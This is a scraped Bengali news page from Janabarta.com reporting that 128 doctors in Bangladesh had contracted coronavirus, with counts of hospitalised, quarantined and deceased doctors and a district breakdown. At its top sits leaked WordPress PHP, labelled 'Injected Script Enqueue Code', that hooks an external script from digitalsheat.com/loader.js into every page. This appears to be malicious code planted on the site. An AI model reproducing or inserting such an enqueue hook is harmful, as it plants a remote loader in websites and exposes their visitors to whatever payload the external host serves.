// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site দেশে সংক্রমিত ১২৮ চিকিৎসক - Janabarta.com

দেশে সংক্রমিত ১২৮ চিকিৎসক

নিজস্ব প্রতিবেদক: দেশে ছড়িয়ে পড়েছে মহামারি করোনাভাইরাস। বাদ যাচ্ছেন না অতি সচেতন চিকিৎসকরাও, এখন পর্যন্ত ১২৮ জন আক্রান্ত হয়েছেন। গতকাল রাতে এই তথ্য সরবরাহ করেন বাংলাদেশ ডক্টরস ফাউন্ডেশনের (বিডিএফ) প্রধান সমন্বয়ক ডা. নিরূপম দাশ। এ বিষয়ে উদ্বেগ প্রকাশ করে তিনি বলেন, চিকিৎসকরা এভাবে আক্রান্ত হতে থাকলে স্বাস্থ্যখাত ভেঙ্গে পড়তে পারে।

আক্রান্ত চিকিৎসকদের মধ্যে হাসপাতালে ভর্তি আছেন ৫৩ জন। মারা গেছেন একজন। নিবিড় পরিচর্যা কেন্দ্রে (আইসিইউ) আছেন ১ জন। চিকিৎসার পর সুস্থ হয়ে বাড়ি ফিরেছেন ৩ জন। বাকিরা আইসোলেশনে। এছাড়া আক্রান্তদের সংস্পর্শে আসা ৩০০ জন চিকিৎসক কোয়ারেন্টাইনে আছেন।

মূলত রোগীদের তথ্য গোপন করার কারণেই দেশজুড়ে চিকিৎসকদের মধ্যে করোনাভাইরাস ছড়িয়ে পড়েছে। বারবার অনুরোধ করার পরও অনেক রোগী মিথ্যা তথ্য দিয়ে হাসপাতালে ভর্তি হচ্ছেন, অতঃপর সেবা দিতে গিয়ে আক্রান্ত হচ্ছেন চিকিৎসকরা। কিছুদিন আগে নারায়ণগঞ্জের এক রোগী মাদারীপুরের ঠিকানা দিয়ে রাজধানীর মিটফোর্ড হাসপাতালে ভর্তি হলে সেখানে করোনা ছড়িয়েছে ২৩ জন চিকিৎসকসহ ৪২ জন স্বাস্থ্যকর্মীর শরীরে!

আক্রান্ত চিকিৎসকদের মধ্যে ৬০ ভাগই ঢাকার। এছাড়া নারায়ণগঞ্জে ১২, ময়মনসিংহে ৭ এবং গাজীপুরে ৬ জন আক্রান্ত হয়েছেন। বাকিরা দেশের অন্যান্য জেলার।